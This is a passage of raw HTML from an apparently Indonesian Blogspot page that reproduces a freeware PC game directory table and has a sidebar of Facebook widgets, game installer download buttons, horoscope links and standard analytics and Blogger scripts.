href="http://www.download-free-games.com/freeware_games/prism_guard_shield.htm"><img alt="Prism: Guard Shield" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/prism_guard_shield_icon.gif" width="40" /></a></dd><dd>Stealthy and exciting combat simulator </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/pc/puzzle_pirates.htm">Puzzle Pirates</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/pc/puzzle_pirates.htm"><img alt="Puzzle Pirates" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/puzzle_pirates_icon.gif" width="40" /></a></dd><dd>Solve puzzles, go on adventures, and become a great pirate! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/qbert.htm">Q Bert</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/qbert.htm"><img alt="Q Bert" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/qbert_icon.gif" width="40" /></a></dd><dd>Activate colored blocks and avoid Mr. Coily. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/railroad_tycoon.htm">Railroad Tycoon</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/railroad_tycoon.htm"><img alt="Railroad Tycoon" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/railroad_tycoon_icon.gif" width="40" /></a></dd><dd>A true simulation classic that you can download and play for free! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/rayhound.htm">Ray-Hound</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/rayhound.htm"><img alt="Ray-Hound" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/rayhound_icon.gif" width="40" /></a></dd><dd>Turn the tables on enemy ships in this fun space shooter! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/rumble_box.htm">Rumble Box</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/rumble_box.htm"><img alt="Rumble Box" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/rumble_box_icon.gif" width="40" /></a></dd><dd>Don't get trapped in the box - fight your way out! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/run_like_heck.htm">Run Like Heck</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/run_like_heck.htm"><img alt="Run Like Heck" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/run_like_heck_icon.gif" width="40" /></a></dd><dd>Find out how fast you can go with a dragon chasing after you! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/runesword2.htm">RuneSword 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/runesword2.htm"><img alt="RuneSword 2" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/runesword2_icon.gif" width="40" /></a></dd><dd>Old-school style computer RPG game! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/sauerbraten.htm">Sauerbraten Cube 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/sauerbraten.htm"><img alt="Sauerbraten - Cube 2" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/sauerbraten_icon.gif" width="40" /></a></dd><dd>A fun shooter with its own game creation engine </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/savage.htm">Savage - BFN</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/savage.htm"><img alt="Savage - Battle for Newerth" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/savage_icon.gif" width="40" /></a></dd><dd>An actio-packed Real Time Strategy Shooter game! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/sea_of_chaos.htm">Sea of Chaos</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/sea_of_chaos.htm"><img alt="Sea of Chaos" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/sea_of_chaos_icon.gif" width="40" /></a></dd><dd>Bring peace to the chaotic high-seas in this boating shooter! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/sopwith_3.htm">Sopwith 3.0</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/sopwith_3.htm"><img alt="Sopwith 3.0" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/sopwith_30_icon.gif" width="40" /></a></dd><dd>A classic aerial strategy game full of biplane hijinks </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/steel_panthers.htm">Steel Panthers: WAW</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/steel_panthers.htm"><img alt="Steel Panthers" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/steel_panthers_icon.gif" width="40" /></a></dd><dd>Hone your war tactics with Steel Panthers: World at War! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/stranded_2.htm">Stranded 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/stranded_2.htm"><img alt="Stranded 2" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/stranded_2_icon.gif" width="40" /></a></dd><dd>Make yourself a home on a strange island! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/synaesthete.htm">Synaesthete</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/synaesthete.htm"><img alt="Synaesthete" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/synaesthete_icon.gif" width="40" /></a></dd><dd>A beautiful techno-driven musical shooter! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/the_blob.htm">The Blob</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/the_blob.htm"><img alt="The Blob" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/the_blob_icon.gif" width="40" /></a></dd><dd>Ready to paint the town red, blue, and green? </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/silver_lining.htm">The Silver Lining</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/silver_lining.htm"><img alt="The Silver Lining" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/silver_lining_icon.gif" width="40" /></a></dd><dd>An amazing fan-driven addition to the King's Quest adventure saga! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/simpsons_jeopardy.htm">Simpsons Jeopardy</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/simpsons_jeopardy.htm"><img alt="The Simpsons Jeopardy" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/simpsons_jeopardy_icon.gif" width="40" /></a></dd><dd>The Simpsons for 500, Alex! Fun Simpsons trivia. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/the_spirit_engine.htm">The Spirit Engine</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/the_spirit_engine.htm"><img alt="The Spirit Engine" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/the_spirit_engine_icon.gif" width="40" /></a></dd><dd>Defeat the evil Frontier Corp. with a team of heroes. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/titanion.htm">Titanion</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/titanion.htm"><img alt="Titanion" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/titanion_icon.gif" width="40" /></a></dd><dd>Blast your way to classic space shooting fun </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/toblo.htm">Toblo</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/toblo.htm"><img alt="Toblo" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/toblo_icon.gif" width="40" /></a></dd><dd>Have fun with this fast-paced 3D capture the flag game </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/transcendence.htm">Transcendence</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/transcendence.htm"><img alt="Transcendence" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/transcendence_icon.gif" width="40" /></a></dd><dd>Fight over 100 different kinds of enemy ships! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/tremulous.htm">Tremulous</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/tremulous.htm"><img alt="Tremulous" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/tremulous_icon.gif" width="40" /></a></dd><dd>Free team-based shooter with real-time strategy! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/tripline.htm">Tripline</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/tripline.htm"><img alt="Tripline" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/tripline_icon.gif" width="40" /></a></dd><dd>A fun and challenging pick three puzzle game. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/truck_dismount.htm">Truck Dismount</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/truck_dismount.htm"><img alt="Truck Dismount" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/truck_dismount_icon.gif" width="40" /></a></dd><dd>Do as much damage as you can to a stick-figure crash dummy! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/tux_typing.htm">Tux Typing</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/tux_typing.htm"><img alt="Tux Typing" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/tux_typing_icon.gif" width="40" /></a></dd><dd>Typing tutor with the Linux penguin, Tux. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/typhoon_2001.htm">Typhoon 2001</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/typhoon_2001.htm"><img alt="Typhoon 2001" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/typhoon_2001_icon.gif" width="40" /></a></dd><dd>Color remake of the arcade classic Tempest. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/ur-quan_masters.htm">Ur-Quan Masters</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/ur-quan_masters.htm"><img alt="Ur-Quan Masters" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/ur_quan_masters_icon.gif" width="40" /></a></dd><dd>Lead a rebellion against the evil Ur-Quan. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/warsow.htm">Warsow</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/warsow.htm"><img alt="Warsow" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/warsow_icon.gif" width="40" /></a></dd><dd>An out of this world, fast-paced multiplayer FPS! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/what_linus_bruckman_sees.htm">Linus Bruckman </a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/what_linus_bruckman_sees.htm"><img alt="What Linus Bruckman Sees" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/what_linus_bruckman_sees_icon.gif" width="40" /></a></dd><dd>Gods, aliens, samurai, and Charlton Heston </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/wolfenstein_et.htm">Wolfenstein: ET</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/wolfenstein_et.htm"><img alt="Wolfenstein: Enemy Territory" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/wolfenstein_et_icon.gif" width="40" /></a></dd><dd>WWII First Person Shooter of extraordinary quality! </dd></dl> </td> </tr><tr> </tr> </tbody></table> </div><!-- end #cat-index-secondary --> </div><!-- end #main-content --> <div id="footer"> <p> <strong>Main Categories : </strong> <a href="http://www.download-free-games.com/download/cat/adventure">Adventure Games</a> | <a href="http://www.download-free-games.com/download/cat/arcade/">Arcade Games</a> | <a href="http://www.download-free-games.com/download/cat/board/">Board Games</a> | <a href="http://www.download-free-games.com/download/cat/cards/">Card Games</a> | <a href="http://www.download-free-games.com/download/cat/chess/">Chess Games</a> | <a href="http://www.download-free-games.com/download/cat/kids/">Kids Games</a> | <a href="http://www.download-free-games.com/download/cat/pool/">Pool Games</a> | <a href="http://www.download-free-games.com/download/cat/puzzle/">Puzzle Games</a> | <a href="http://www.download-free-games.com/download/cat/racing/">Racing Games</a><br /> <a href="http://www.download-free-games.com/download/cat/rpg/">Role-Playing Games</a> | <a href="http://www.download-free-games.com/download/cat/simulation/">Simulation Games</a> | <a href="http://www.download-free-games.com/download/cat/war_strategy/">War & Strategy Games</a> | <a href="http://www.download-free-games.com/download/cat/word/">Word Games</a> </p> <p> <strong>Sub Categories : </strong> <a href="http://www.download-free-games.com/download/cat/hidden_pictures_objects">Hidden Object Games</a> | <a href="http://www.download-free-games.com/download/cat/task_management/">Task Management Games</a> | <a href="http://www.download-free-games.com/download/cat/action/">Action Games</a> | <a href="http://www.download-free-games.com/download/cat/shooters/">Shooter Games</a> | <a href="http://www.download-free-games.com/download/cat/match_3/">Match 3 Games</a> | <a href="http://www.download-free-games.com/download/cat/misc_puzzle/">Misc. Puzzle Games</a> | <a href="http://www.download-free-games.com/download/cat/business/">Business Games</a><br /> <a href="http://www.download-free-games.com/download/cat/various_simulation/">Various Simulation Games</a> | <a href="http://www.download-free-games.com/download/cat/action_shooter/">Shooter War Games</a> | <a href="http://www.download-free-games.com/download/cat/strategy/">Strategy Games</a> | <a href="http://www.download-free-games.com/download/cat/rts/">Real Time Strategy Games</a> </p> <p> <a href="http://www.download-free-games.com/">Download Free Games</a> | <a href="http://www.download-free-games.com/blog/">Blog</a> | <a href="http://www.download-free-games.com/about_us.htm">About Us</a> | <a href="http://www.download-free-games.com/contact.htm" rel="nofollow">Contact</a> | <a href="http://www.download-free-games.com/privacy.htm">Privacy</a> | <a href="http://www.download-free-games.com/terms.htm" rel="nofollow">Terms of Use</a> | <a href="http://www.download-free-games.com/retired/">Retired Games</a> | <a href="http://www.download-free-games.com/freesites.htm">Game Sites</a> | <a href="http://www.download-free-games.com/reviews/index.htm">Site Reviews</a> </p> <p> Friends: <a href="http://www.freebielist.com/">Freebielist - Freebies</a> <a href="http://www.thestoryofjesus.com/">The Story of Jesus</a> </p> <p> <a href="http://www.etrust.org/cert/785398.html" target="_blank"><img align="absmiddle" alt="DFG - eTrust Certified" border="0" height="40" src="http://cdn.dfgfile.com/imgs/dfg_etrust_cert.gif" width="131" /></a>© Copyright 2009 Alpha Internet Consulting LLC & Download Free Games (TM) - All Rights Reserved </p> </div><!-- end #footer --> <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script> <script type="text/javascript"> _uacct = "UA-1008073-1"; urchinTracker(); </script> </div><!-- end #container --> <script type="text/javascript" src="http://www.download-free-games.com/scripts/jquery.js"></script> <script type="text/javascript" src="http://www.download-free-games.com/scripts/genfunctions.js"></script> <script type="text/javascript"> $(document).ready(function() { function moveAds(){$('#test-ss').appendTo('#cat-top-wid');} moveAds(); }); </script> <!-- end #test-ss --> <div style='clear: both;'></div> </p> <div class='endline'></div> <p class='commentline'> <a href='https://www.blogger.com/comment.g?blogID=1518176830031402701&postID=6536150032681312034&isPopup=true' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a> </p> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='post-footer-line post-footer-line-2'> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post-bottom'></div> <div class='endline'></div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='http://jangkrikvirusdago.blogspot.com/search?updated-max=2010-02-20T01:17:00%2B07:00&max-results=7&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Postingan Lebih Baru'>Postingan Lebih Baru</a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://jangkrikvirusdago.blogspot.com/search?updated-max=2009-07-26T15:58:00%2B07:00&max-results=7' id='Blog1_blog-pager-older-link' title='Postingan Lama'>Postingan Lama</a> </span> <a class='home-link' href='http://jangkrikvirusdago.blogspot.com/'>Beranda</a> </div> <div class='clear'></div> <div class='blog-feeds'> <div class='feed-links'> Langganan: <a class='feed-link' href='http://jangkrikvirusdago.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Postingan (Atom)</a> </div> </div> </div></div> </div> <!-- /Content --> <!-- Sidebar --> <div id='sidebar'> <ul> <!-- Welcome Message --> <li id='about-me'> <h2>About Me</h2> <div class='welcome1 section' id='welcome1'><div class='widget HTML' data-version='1' id='HTML4'> <h2 class='title'>jangkrikvirusdago's Fan Box</h2> <div class='widget-content'> <script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/id_ID"></script><div id="fb-root"></div> <script> window.fbAsyncInit = function() { FB.init({ appId: "300784169572", xfbml: true }); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); </script> <fb:fan profile_id="300784169572" stream="0" connections="10" logobar="1" width="300"></fb:fan> <div style="font-size:8px; padding-left:10px"> <a href="http://www.jangkrikvirusdago.blogspot.com">jangkrikvirusdago</a> on Facebook </div> </div> <div class='clear'></div> </div><div class='widget Profile' data-version='1' id='Profile1'> <h2>About Me</h2> <div class='widget-content'> <a href='https://www.blogger.com/profile/07274922915176382689'><img alt='Foto Saya' class='profile-img' height='80' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiivkt9Pm3ZaRjQAzyaXHumaRuI4HTYPv2b-td_uONqn0cxadU1Zlw50Pt7IpTKOvSvr1dJn19Sq3uECGrZJ8Ms4oj5RKKf875kqaJ-ELEx14sXX_dFCeacH5bprXtTZTA/s220/DSC02329.JPG' width='60'/></a> <dl class='profile-datablock'> <dt class='profile-data'>jangkrikvirus</dt> <dd class='profile-textblock'>Selamat datang di blog jangkrikdago!!!!!!!!!</dd> </dl> <a class='profile-link' href='https://www.blogger.com/profile/07274922915176382689'>Lihat profil lengkapku</a> <div class='clear'></div> </div> </div><div class='widget HTML' data-version='1' id='HTML1'> <h2 class='title'>My facebook</h2> <div class='widget-content'> <!-- Facebook Badge START --><a href="http://id-id.facebook.com/people/Asep-Classic/1532637096" title="Asep Classic" target="_TOP" style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal; color: #3B5998; text-decoration: none;">Asep Classic</a><br /><a href="http://id-id.facebook.com/people/Asep-Classic/1532637096" title="Asep Classic" target="_TOP"><img src="http://badge.facebook.com/badge/1532637096.1662.139694753.png" width="120" height="234" style="border: 0px;" /></a><br /><a href="http://id-id.facebook.com/facebook-widgets/" title="Buat lencana Anda sendiri!" target="_TOP" style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal; color: #3B5998; text-decoration: none;">Buat Lencana Anda</a><!-- Facebook Badge END --> </div> <div class='clear'></div> </div><div class='widget Image' data-version='1' id='Image10'> <h2>DOWNLOAD FREE GAME POINT BLANK</h2> <div class='widget-content'> <a href='http://download.gemscool.com/pb/PBSetup.exe'> <img alt='DOWNLOAD FREE GAME POINT BLANK' height='73' id='Image10_img' src='http://1.bp.blogspot.com/_ZRdKbqgPB-8/TDyYX-_DfUI/AAAAAAAAAEU/br9_eJKxtwM/S237/buttonDownload.png' width='189'/> </a> <br/> </div> <div class='clear'></div> </div><div class='widget Image' data-version='1' id='Image11'> <h2>FREE DOWNLOAD GAME CROSS FIRE</h2> <div class='widget-content'> <a href='http://www.brothersoft.com/d.php?soft_id=214279&url=http%3A%2F%2Flfiles3.brothersoft.com%2Fgames%2Fnew%2Fshooting_games%2Ffirst_person%2FCrossFire_Setup_v1045.exe'> <img alt='FREE DOWNLOAD GAME CROSS FIRE' height='32' id='Image11_img' src='http://3.bp.blogspot.com/_ZRdKbqgPB-8/TDybi_ql00I/AAAAAAAAAEk/x4igJuqapSI/S237/cross_fire-214279-1275361663.jpeg' width='32'/> </a> <br/> </div> <div class='clear'></div> </div><div class='widget Image' data-version='1' id='Image5'> <h2>download software</h2> <div class='widget-content'> <a href='http://www.brothersoft.com/'> <img alt='download software' height='89' id='Image5_img' src='http://3.bp.blogspot.com/_ZRdKbqgPB-8/S4BWmKow73I/AAAAAAAAADo/LdiUKuGm8Fo/S237/logo1.gif' width='237'/> </a> <br/> </div> <div class='clear'></div> </div><div class='widget Followers' data-version='1' id='Followers1'> <h2 class='title'>Followers</h2> <div class='widget-content'> <div id='Followers1-wrapper'> <div style='margin-right:2px;'> <div><script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <div id="followers-iframe-container"></div> <script type="text/javascript"> window.followersIframe = null; function followersIframeOpen(url) { gapi.load("gapi.iframes", function() { if (gapi.iframes && gapi.iframes.getContext) { window.followersIframe = gapi.iframes.getContext().openChild({ url: url, where: document.getElementById("followers-iframe-container"), messageHandlersFilter: gapi.iframes.CROSS_ORIGIN_IFRAMES_FILTER, messageHandlers: { '_ready': function(obj) { window.followersIframe.getIframeEl().height = obj.height; }, 'reset': function() { window.followersIframe.close(); followersIframeOpen("https://www.blogger.com/followers.g?blogID\x3d1518176830031402701\x26colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByM1NTU1NTUiByNhN2IwYjcqByNGRkZGRkYyByMzYTRjNjI6ByM1NTU1NTVCByNhN2IwYjdKByMwMDAwMDBSByNhN2IwYjdaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26origin\x3dhttp://jangkrikvirusdago.blogspot.com/"); }, 'open': function(url) { window.followersIframe.close(); followersIframeOpen(url); }, 'blogger-ping': function() { } } }); } }); } followersIframeOpen("https://www.blogger.com/followers.g?blogID\x3d1518176830031402701\x26colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByM1NTU1NTUiByNhN2IwYjcqByNGRkZGRkYyByMzYTRjNjI6ByM1NTU1NTVCByNhN2IwYjdKByMwMDAwMDBSByNhN2IwYjdaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26origin\x3dhttp://jangkrikvirusdago.blogspot.com/"); </script></div> </div> </div> <div class='clear'></div> </div> </div><div class='widget Poll' data-version='1' id='Poll1'> <h2 class='title'>Mengapa anda tertarik melihat blog ini?</h2> <div class='widget-content'> <iframe allowtransparency='true' frameborder='0' height='160' name='poll-widget2414118921187359066' style='border:none; width:100%;'></iframe> <div class='clear'></div> </div> </div><div class='widget Image' data-version='1' id='Image6'> <h2>My Jodiak</h2> <div class='widget-content'> <a href='http://kosmo.vivanews.com/news/read/129497-horoskop_15___21_februari_2010'> <img alt='My Jodiak' height='237' id='Image6_img' src='http://4.bp.blogspot.com/_ZRdKbqgPB-8/S4CWrRKIxXI/AAAAAAAAAD0/3Et11O6U9U4/S237/virgo-mg.gif' width='150'/> </a> <br/> </div> <div class='clear'></div> </div><div class='widget Image' data-version='1' id='Image7'> <h2>Ramalan</h2> <div class='widget-content'> <a href='http://www.gemintang.com/ramalan-nasib-jodoh-masa-depan/kecocokan-jodoh/'> <img alt='Ramalan' height='31' id='Image7_img' src='http://1.bp.blogspot.com/_ZRdKbqgPB-8/S4CXpCc2uGI/AAAAAAAAAD8/BFWJJClJ2c0/S237/headerbg.jpg' width='237'/> </a> <br/> </div> <div class='clear'></div> </div><div class='widget Image' data-version='1' id='Image8'> <h2>Cari jodoh</h2> <div class='widget-content'> <a href='http://www.gemintang.com/ramalan-nasib-jodoh-masa-depan/kecocokan-jodoh/'> <img alt='Cari jodoh' height='51' id='Image8_img' src='http://1.bp.blogspot.com/_ZRdKbqgPB-8/S4Ccwkv0nOI/AAAAAAAAAEE/kcDXuwi4C_Y/S237/logo3.gif' width='237'/> </a> <br/> </div> <div class='clear'></div> </div> <div class='widget HTML' data-version='1' id='HTML99'> <p> </p> </div><div class='widget Image' data-version='1' id='Image9'> <h2>free game pc download</h2> <div class='widget-content'> <a href='http://www.freegamepick.com/en/racing.html'> <img alt='free game pc download' height='63' id='Image9_img' src='http://3.bp.blogspot.com/_ZRdKbqgPB-8/S82SllHdSPI/AAAAAAAAAEM/H0wbkPjG6xU/S237/logo.gif' 